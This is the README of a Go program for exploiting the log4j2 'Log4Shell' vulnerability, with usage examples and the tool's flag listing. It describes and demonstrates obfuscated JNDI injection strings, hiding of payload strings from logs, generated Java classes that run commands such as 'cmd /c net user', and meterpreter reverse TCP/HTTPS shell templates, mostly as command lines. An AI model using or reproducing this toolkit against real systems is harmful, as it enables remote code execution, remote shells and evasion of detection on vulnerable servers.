Check, exploit, generate class, obfuscate, TLS, ACME about log4j2 vulnerability in one Go program.
- Only one program and easy deployment
- Support common operating systems
- Support multi Java class files
- Support LDAPS and HTTPS server
- Support ACME to sign certificate
- Generate class without Java compiler
- Support obfuscate malicious(payload)
- Hide malicious(payload) string
- Add secret to protect HTTP server
- Add token to fix repeat execute payload
Log4Shell.exe -host ""
Log4Shell.exe -host ""
Log4Shell.exe -host "" -tls-server -tls-cert "cert.pem" -tls-key "key.pem"
Log4Shell.exe -host "" -tls-server -tls-cert "cert.pem" -tls-key "key.pem"
(need IP SANs)
Log4Shell.exe -host "" -auto-cert
(must use domain name)
Execute(no output):
Log4Shell.exe -gen "execute" -args "-cmd calc" -class "Test"
System(with output):
Log4Shell.exe -gen "system" -args "-bin cmd -args \"/c net user\"" -class "Test"
ReverseTCP(java/meterpreter/reverse_tcp): // template will be open source after some time
Log4Shell.exe -gen "reverse_tcp" -args "-lhost -lport 9979" -class "Test"
ReverseHTTPS(java/meterpreter/reverse_https): // template will be open source after some time
Log4Shell.exe -gen "reverse_https" -args "-lhost -lport 8443 -luri test" -class "Test"
The generated class file will be saved to the payload directory(can set output flag)
Log4Shell.exe -obf "${jndi:ldap://}"
raw: ${jndi:ldap://$cz3z]Y_pWxAoLPWh}
da}${W(d:KSR)ky3:bv78UX2R-5MV:-p:/}/1.${)U:W9y=N:-}${i9yX1[:Z[Ve2=IkT=Z-96:-1.1}${[W*W:[email protected]
Each string can only be used once, or wait 20 seconds.
When obfuscate malicious(payload) string, log4j2 package will repeat execute it, the number of
repetitions is equal the number of occurrences about string "${". The LDAP server add a simple
token mechanism for prevent it.
Log4Shell.exe -obf "${jndi:ldap://}" -hide
raw: ${jndi:ldap://$YG=.z[.od7rH0XpE}
Execute VulApp:
E:\OneDrive\Projects\Golang\GitHub\Log4Shell\vulapp\jar>D:\Java\jdk1.8.0_121\bin\java -jar
vulapp.jar ${j${0395i1-WV[nM-Pv:-nd}i${KoxnAt-KVA6T4:Xggnr:-}:${vlt0_:xTI:-}${kMe=A:QD3FK:
15:49:14.676 [main] ERROR log4j - XpE}
The Logger will only record a part of raw string "15:49:14.676 [main] ERROR log4j - XpE}",
and repeat execute will not appear(I don't know why this happened).
- start Log4Shell server
- send
- send
with TLS
- start Log4Shell server
- put your class file to the payload directory
- send
- send
with TLS - meterpreter will open source after some time
- VulApp is a vulnerable Java program that use log4j2 package.
- You can use it for develop this project easily.
java -jar vulapp.jar ${jndi:ldap://}
::: :::::::: :::::::: ::: :::::::: ::: ::: :::::::::: ::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +#+ +:+ :#: +#+ +:+ +#++:++#++ +#++:++#++ +#++:++# +#+ +#+
+#+ +#+ +#+ +#+ +#+# +#+#+#+#+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+#
######## ######## ######## ### ######## ### ### ########## ######## ########
Usage of Log4Shell.exe:
-args string
arguments about generate Java class file
use ACME client to sign certificate automatically
-class string
specify the new class name
-gen string
generate Java class file with template name
hide obfuscated malicious(payload) string in log4j2
-host string
server IP address or domain name (default "")
-http-addr string
http server address (default ":8080")
-http-net string
http server network (default "tcp")
-ldap-addr string
ldap server address (default ":3890")
-ldap-net string
ldap server network (default "tcp")
not add random token when use obfuscate
-obf string
obfuscate malicious(payload) string
-output string
generated Java class file output path
-payload string
payload(java class) directory (default "payload")
-tls-cert string
tls certificate file path (default "cert.pem")
-tls-key string
tls private key file path (default "key.pem")
enable ldaps and https server